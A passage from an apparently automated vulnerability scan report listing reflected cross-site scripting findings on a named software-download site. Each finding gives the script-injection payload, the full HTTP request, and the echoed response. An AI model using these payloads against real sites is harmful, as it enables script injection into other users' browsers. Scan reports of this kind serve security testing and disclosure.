Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/linktous.html?cfe20"><script>alert(1)</script>73a79dc6461=1" />
...[SNIP]...

4.1811. http://www.x64bitdownload.com/login.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /login.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90208"><script>alert(1)</script>513c51908fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.html90208"><script>alert(1)</script>513c51908fe HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/login.html90208"><script>alert(1)</script>513c51908fe" />
...[SNIP]...

4.1812. http://www.x64bitdownload.com/new-reviews.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-reviews.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d8f"><script>alert(1)</script>0e3502762a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-reviews.html32d8f"><script>alert(1)</script>0e3502762a9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:28:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-reviews.html32d8f"><script>alert(1)</script>0e3502762a9" />
...[SNIP]...

4.1813. http://www.x64bitdownload.com/new-reviews.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-reviews.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabf"><script>alert(1)</script>0fd7b226cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-reviews.html?efabf"><script>alert(1)</script>0fd7b226cd3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:17 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 56348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-reviews.html?efabf"><script>alert(1)</script>0fd7b226cd3=1" />
...[SNIP]...

4.1814. http://www.x64bitdownload.com/new-software.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a3ba"><script>alert(1)</script>991a789ffdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-software.html7a3ba"><script>alert(1)</script>991a789ffdb HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-software.html7a3ba"><script>alert(1)</script>991a789ffdb" />
...[SNIP]...

4.1815. http://www.x64bitdownload.com/new-software.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /new-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6b9"><script>alert(1)</script>0bb8bbb0810 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-software.html?5c6b9"><script>alert(1)</script>0bb8bbb0810=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:36 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 120351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/new-software.html?5c6b9"><script>alert(1)</script>0bb8bbb0810=1" />
...[SNIP]...

4.1816. http://www.x64bitdownload.com/ratestars.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /ratestars.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98f8"><script>alert(1)</script>4fb8449076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratestars.htmlf98f8"><script>alert(1)</script>4fb8449076 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/ratestars.htmlf98f8"><script>alert(1)</script>4fb8449076" />
...[SNIP]...

4.1817. http://www.x64bitdownload.com/ratestars.html [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /ratestars.html

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc10"><script>alert(1)</script>171150b91a2 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ratestars.html?j=1&q=lhtivudsecc10"><script>alert(1)</script>171150b91a2&t=173.193.214.243&c=5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: nocache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/ratestars.html?j=1&q=lhtivudsecc10"><script>alert(1)</script>171150b91a2&t=173.193.214.243&c=5" />
...[SNIP]...

4.1818. http://www.x64bitdownload.com/rss/downloads.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /rss/downloads.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1476"><script>alert(1)</script>9457535a8e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rsse1476"><script>alert(1)</script>9457535a8e1/downloads.xml HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/rsse1476"><script>alert(1)</script>9457535a8e1/downloads.xml" />
...[SNIP]...

4.1819. http://www.x64bitdownload.com/rss/downloads.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /rss/downloads.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a07"><script>alert(1)</script>79728d417c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rss/downloads.xmlb6a07"><script>alert(1)</script>79728d417c5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/rss/downloads.xmlb6a07"><script>alert(1)</script>79728d417c5" />
...[SNIP]...

4.1820. http://www.x64bitdownload.com/saved-software.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21945"><script>alert(1)</script>5b51a8a7029 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saved-software.html21945"><script>alert(1)</script>5b51a8a7029 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/saved-software.html21945"><script>alert(1)</script>5b51a8a7029" />
...[SNIP]...

4.1821. http://www.x64bitdownload.com/saved-software.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /saved-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955f"><script>alert(1)</script>40eb90fe594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saved-software.html?c955f"><script>alert(1)</script>40eb90fe594=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/saved-software.html?c955f"><script>alert(1)</script>40eb90fe594=1" />
...[SNIP]...

4.1822. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b5b"><script>alert(1)</script>17473a35adb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot32b5b"><script>alert(1)</script>17473a35adb/communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot32b5b"><script>alert(1)</script>17473a35adb/communitymate-download-qeakzpwv.html" />
...[SNIP]...

4.1823. http://www.x64bitdownload.com/screenshot/communitymate-download-qeakzpwv.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/communitymate-download-qeakzpwv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68784"><script>alert(1)</script>91cdfef4f9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/68784"><script>alert(1)</script>91cdfef4f9f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/68784"><script>alert(1)</script>91cdfef4f9f" />
...[SNIP]...

4.1824. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2bd"><script>alert(1)</script>bad4adca0ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot3a2bd"><script>alert(1)</script>bad4adca0ce/news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot3a2bd"><script>alert(1)</script>bad4adca0ce/news-file-grabber-download-stclytop.html" />
...[SNIP]...

4.1825. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a532"><script>alert(1)</script>a50852b0f49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/4a532"><script>alert(1)</script>a50852b0f49 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/4a532"><script>alert(1)</script>a50852b0f49" />
...[SNIP]...

4.1826. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d9b4"><script>alert(1)</script>4af4e68853c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot1d9b4"><script>alert(1)</script>4af4e68853c/newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot1d9b4"><script>alert(1)</script>4af4e68853c/newsgroup-commander-pro-download-rjfsmxpp.html" />
...[SNIP]...

4.1827. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e3a"><script>alert(1)</script>f98dca8ff54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/98e3a"><script>alert(1)</script>f98dca8ff54 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/98e3a"><script>alert(1)</script>f98dca8ff54" />
...[SNIP]...

4.1828. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54c84"><script>alert(1)</script>b177d980758 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot54c84"><script>alert(1)</script>b177d980758/ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot54c84"><script>alert(1)</script>b177d980758/ozum-download-lhtivuds.html" />
...[SNIP]...

4.1829. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /screenshot/ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a650"><script>alert(1)</script>4eac85a3ec4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/2a650"><script>alert(1)</script>4eac85a3ec4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response
